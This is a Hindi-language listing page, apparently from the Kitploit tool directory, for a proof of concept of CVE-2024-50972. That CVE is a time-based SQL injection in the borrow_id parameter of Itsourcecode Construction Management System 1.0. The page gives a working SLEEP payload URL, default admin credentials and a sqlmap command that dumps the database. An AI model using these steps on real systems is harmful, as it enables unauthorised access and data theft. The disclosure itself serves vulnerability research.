Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50972 — Itsourcecode Construction Management System 1.0 में SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, borrow_id पैरामीटर के माध्यम से समय-आधारित इंजेक्शन का प्रदर्शन और शोषण चरण प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/akhlak2511/cve-2024-50972
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Itsourcecode Construction Management System 1.0 में SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट, borrow_id पैरामीटर के माध्यम से समय-आधारित इंजेक्शन का प्रदर्शन और शोषण चरण प्रदान करता है।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50972

विवरण

Itsourcecode Construction Management System 1.0 के printtool.php में एक SQL injection कमजोरी है जो दूरस्थ हमलावरों को borrow_id पैरामीटर के माध्यम से मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।

भेद्यता प्रकार

SQL Injection

उत्पाद का विक्रेता

Itsourcecode

प्रभावित उत्पाद कोड बेस:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

प्रभावित घटक:

Itsourcecode Construction Management System v1.0 printtool.php पेज पर borrow_id पैरामीटर के माध्यम से SQL injection के लिए संवेदनशील है।

हमले के वेक्टर:

  1. एप्लिकेशन को स्थानीय रूप से सेट अप करें, और admin:admin के रूप में व्यवस्थापक क्रेडेंशियल के साथ लॉग इन करें।
  2. अपने ब्राउज़र में निम्न URL पर जाएँ: http://localhost/monitoring_system/printtool.php?borrow_id=5
  • SQL पेलोड इंजेक्ट करें: URL में borrow_id पैरामीटर को संशोधित करके समय-आधारित SQL injection पेलोड शामिल करें। http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  • एप्लिकेशन प्रतिक्रिया का निरीक्षण करें: यदि इंजेक्शन सफल होता है तो पेज को लोड होने में काफी अधिक समय (20 सेकंड) लगना चाहिए, जो पुष्टि करता है कि borrow_id पैरामीटर SQL injection के लिए संवेदनशील है।
  • अब SQLMap टूल का उपयोग करके आगे शोषण और डेटाबेस डंप करने के लिए नीचे दिए गए कमांड का उपयोग करें: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • संदर्भ:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    टूल डाउनलोड करें